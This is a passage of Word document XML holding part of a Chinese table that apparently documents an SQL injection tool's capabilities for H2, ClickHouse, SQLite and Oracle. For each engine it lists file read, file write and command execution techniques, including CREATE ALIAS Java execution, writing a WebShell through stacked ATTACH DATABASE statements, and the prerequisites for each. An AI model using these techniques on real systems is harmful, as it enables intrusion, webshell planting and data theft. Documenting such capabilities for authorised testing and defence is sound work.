        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="489378C4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="6C35821A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="4E938DB2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="0A855E52">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_WRITE(x'hex')（返回写入字节数天然验证）；大文件自动切 CREATE ALIAS 分片</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="4E1B8FE6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道（大文件分片需 S）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="457B39EC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>admin 权限；分片需 JDK 编译器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="33A65C88">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1C618AEE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="47C717A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="37023B70">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CREATE ALIAS Java 函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="323A32B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6881876C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JDK 编译器 javax.tools 可用（H2 1.x/2.x 均支持，JRE 不可用）；管道/重定向自行加 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/bin/sh -c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 或 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cmd /c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="02F9709E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="55B09D60">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ClickHouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="1F9AD832">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="289FA9F6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 表函数 + hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="4FA78610">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="0FA360F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>仅 user_files 目录内文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="760E36C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1FEA3D24"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2BFD50C4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2CD89BA0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0BEE6B12">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="78839C44">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>INTO OUTFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 为 clickhouse-client 客户端侧功能，HTTP 接口固定报错 358</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4471177A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="28E19E92"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="3CC2A478">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="79AFB862">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="79BEBD06">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="5335C94E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>无执行通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="4D328980">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1028D4AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="260F71A2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5F2ECE7C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>readfile()（fileio 扩展 blob 无损）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3A0BAA72">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="53DD713C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标加载了官方 fileio 扩展（如 Calibre），否则函数不存在优雅降级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="49202F84">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="1104E496"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="2BB8957C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="2E6004B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>writefile(path, x'hex')（返回字节数验证；无追加能力，超上限提示改 ATTACH）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="6CFF1B4E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="4F4F1C80">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>同上（fileio 扩展）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="745535F6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="36446F70"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="78219452">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4C78D3D8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ATTACH DATABASE 写 WebShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="59C2A082">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="706417BC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>堆叠三条语句（attach/create/insert）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="52DC401C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2DACA32C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="3BEB0CF2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="7A09C220">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="2B2D5210">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="7AA94BC4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>load_extension 默认禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="12262954">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2028DC6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="024F9E50">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="23914278">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Java SqliRead / SqliReadHex 分片（GETXML 通道免堆叠部署）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="785EDCA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4558346A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9i~11g（DBMS_XMLQUERY 可用）+ CREATE PROCEDURE 权限 + JVM；返回值限 4000 字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3067FF3C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
